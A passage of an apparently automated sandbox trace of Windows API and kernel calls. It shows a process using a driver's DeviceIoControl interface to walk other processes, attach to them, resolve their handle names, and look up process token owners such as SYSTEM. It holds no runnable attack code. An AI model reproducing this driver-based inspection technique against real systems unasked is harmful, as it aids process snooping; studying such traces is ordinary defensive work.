dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0227.371] PsLookupProcessByProcessId (in: ProcessId=0x548, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.371] PsAcquireProcessExitSynchronization () returned 0x0 [0227.371] KeStackAttachProcess (in: PROCESS=0xfffffa8002fcab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002fcab30, ApcState=0xfffff880052b35d0) [0227.371] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000fa9eb0, HandleInformation=0x0) returned 0x0 [0227.371] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.371] PsReleaseProcessExitSynchronization () returned 0x2 [0227.371] ObfDereferenceObject (Object=0xfffffa8002fcab30) returned 0x27 [0227.371] ObQueryNameString (in: Object=0xfffff8a000fa9eb0, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880052b3550) returned 0x0 [0227.371] ObfDereferenceObject (Object=0xfffff8a000fa9eb0) returned 0xf [0227.371] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.371] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.371] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x98c) returned 0xc8 [0227.371] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0227.371] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8002fe8060, HandleInformation=0x0) returned 0x0 [0227.371] ObOpenObjectByPointer (in: Object=0xfffffa8002fe8060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff8000083c) returned 0x0 [0227.371] ObfDereferenceObject (Object=0xfffffa8002fe8060) returned 0x47 [0227.371] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000083c, DesiredAccess=0x8, TokenHandle=0xfffffa8001f762c0 | out: TokenHandle=0xfffffa8001f762c0*=0xc4) returned 0x0 [0227.372] ZwClose (Handle=0xffffffff8000083c) returned 0x0 [0227.372] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.372] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0227.372] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0227.373] CloseHandle (hObject=0xc4) returned 1 [0227.373] CloseHandle (hObject=0xc8) returned 1 [0227.373] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.373] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0227.373] PsLookupProcessByProcessId (in: ProcessId=0x98c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.373] PsAcquireProcessExitSynchronization () returned 0x0 [0227.374] KeStackAttachProcess (in: PROCESS=0xfffffa8002fe8060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002fe8060, ApcState=0xfffff880052b35d0) [0227.374] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002feb3d0, HandleInformation=0x0) returned 0x0 [0227.374] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.374] PsReleaseProcessExitSynchronization () returned 0x2 [0227.374] ObfDereferenceObject (Object=0xfffffa8002fe8060) returned 0x45 [0227.374] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880052b3508) returned 0x0 [0227.374] ObfDereferenceObject (Object=0xfffffa8002feb3d0) returned 0x1 [0227.374] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.374] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.374] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.374] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x68, lpOverlapped=0x0) returned 1 [0227.374] PsLookupProcessByProcessId (in: ProcessId=0x98c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.374] PsAcquireProcessExitSynchronization () returned 0x0 [0227.374] KeStackAttachProcess (in: PROCESS=0xfffffa8002fe8060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002fe8060, ApcState=0xfffff880052b35d0) [0227.374] ObReferenceObjectByHandle (in: Handle=0x100, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000f62610, HandleInformation=0x0) returned 0x0 [0227.374] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.374] PsReleaseProcessExitSynchronization () returned 0x2 [0227.374] ObfDereferenceObject (Object=0xfffffa8002fe8060) returned 0x45 [0227.374] ObQueryNameString (in: Object=0xfffff8a000f62610, ObjectNameInfo=0xfffffa800315a044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800315a044, ReturnLength=0xfffff880052b3550) returned 0x0 [0227.374] ObfDereferenceObject (Object=0xfffff8a000f62610) returned 0x7 [0227.374] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.375] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.375] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x598) returned 0xc8 [0227.375] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0227.375] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa80021226d0, HandleInformation=0x0) returned 0x0 [0227.375] ObOpenObjectByPointer (in: Object=0xfffffa80021226d0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff8000083c) returned 0x0 [0227.375] ObfDereferenceObject (Object=0xfffffa80021226d0) returned 0xd [0227.375] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000083c, DesiredAccess=0x8, TokenHandle=0xfffffa8001f762c0 | out: TokenHandle=0xfffffa8001f762c0*=0xc4) returned 0x0 [0227.375] ZwClose (Handle=0xffffffff8000083c) returned 0x0 [0227.375] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.375] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0227.375] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0227.378] CloseHandle (hObject=0xc4) returned 1 [0227.378] CloseHandle (hObject=0xc8) returned 1 [0227.378] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.378] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.378] PsLookupProcessByProcessId (in: ProcessId=0x598, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.378] PsAcquireProcessExitSynchronization () returned 0x0 [0227.378] KeStackAttachProcess (in: PROCESS=0xfffffa80021226d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80021226d0, ApcState=0xfffff880052b35d0) [0227.378] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800242e8a0, HandleInformation=0x0) returned 0x0 [0227.378] ObfDereferenceObject (Object=0xfffffa800242e8a0) returned 0x1 [0227.378] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.378] PsReleaseProcessExitSynchronization () returned 0x2 [0227.378] ObfDereferenceObject (Object=0xfffffa80021226d0) returned 0xb [0227.378] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.378] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.378] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.378] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.378] PsLookupProcessByProcessId (in: ProcessId=0x598, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.379] PsAcquireProcessExitSynchronization () returned 0x0 [0227.379] KeStackAttachProcess (in: PROCESS=0xfffffa80021226d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80021226d0, ApcState=0xfffff880052b35d0) [0227.379] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80025c6330, HandleInformation=0x0) returned 0x0 [0227.379] ObfDereferenceObject (Object=0xfffffa80025c6330) returned 0x1 [0227.379] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.379] PsReleaseProcessExitSynchronization () returned 0x2 [0227.379] ObfDereferenceObject (Object=0xfffffa80021226d0) returned 0xb [0227.379] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.379] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.379] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.379] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.379] PsLookupProcessByProcessId (in: ProcessId=0x598, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.379] PsAcquireProcessExitSynchronization () returned 0x0 [0227.379] KeStackAttachProcess (in: PROCESS=0xfffffa80021226d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80021226d0, ApcState=0xfffff880052b35d0) [0227.379] ObReferenceObjectByHandle (in: Handle=0x74, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0x0, HandleInformation=0x0) returned 0xc0000008 [0227.379] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.379] PsReleaseProcessExitSynchronization () returned 0x2 [0227.379] ObfDereferenceObject (Object=0xfffffa80021226d0) returned 0xb [0227.379] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.379] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.379] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.379] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.379] PsLookupProcessByProcessId (in: ProcessId=0x598, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.379] PsAcquireProcessExitSynchronization () returned 0x0 [0227.379] KeStackAttachProcess (in: PROCESS=0xfffffa80021226d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80021226d0, ApcState=0xfffff880052b35d0) [0227.379] ObReferenceObjectByHandle (in: Handle=0x78, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0x0, HandleInformation=0x0) returned 0xc0000008 [0227.379] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.380] PsReleaseProcessExitSynchronization () returned 0x2 [0227.380] ObfDereferenceObject (Object=0xfffffa80021226d0) returned 0xb [0227.380] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.380] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.380] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xaf4) returned 0x0 [0227.380] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.380] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.380] PsLookupProcessByProcessId (in: ProcessId=0xaf4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.380] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.380] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.380] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.380] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.380] PsLookupProcessByProcessId (in: ProcessId=0xaf4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.380] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.380] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.380] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.380] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.380] PsLookupProcessByProcessId (in: ProcessId=0xaf4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.380] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.380] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.380] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.380] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.380] PsLookupProcessByProcessId (in: ProcessId=0xaf4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.380] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.380] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.380] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.380] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.381] PsLookupProcessByProcessId (in: ProcessId=0xaf4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.381] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.381] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.381] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.381] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.381] PsLookupProcessByProcessId (in: ProcessId=0xaf4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.381] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.381] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.381] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.381] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.381] PsLookupProcessByProcessId (in: ProcessId=0xaf4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.381] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.381] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.381] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6dc) returned 0x0 [0227.381] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.381] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.381] PsLookupProcessByProcessId (in: ProcessId=0x6dc, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.381] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.381] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.381] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.381] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.381] PsLookupProcessByProcessId (in: ProcessId=0x6dc, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.381] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.381] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.381] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0x0 [0227.381] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.381] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.381] PsLookupProcessByProcessId (in: ProcessId=0x644, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.382] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.382] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.382] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.382] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.382] PsLookupProcessByProcessId (in: ProcessId=0x644, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.382] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.382] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.382] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.382] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.382] PsLookupProcessByProcessId (in: ProcessId=0x644, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.382] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.382] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.382] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.382] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.382] PsLookupProcessByProcessId (in: ProcessId=0x644, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.382] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.382] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.382] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.382] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.382] PsLookupProcessByProcessId (in: ProcessId=0x644, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.382] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.382] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.382] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.382] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.382] PsLookupProcessByProcessId (in: ProcessId=0x644, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.382] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.382] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.382] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.382] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, 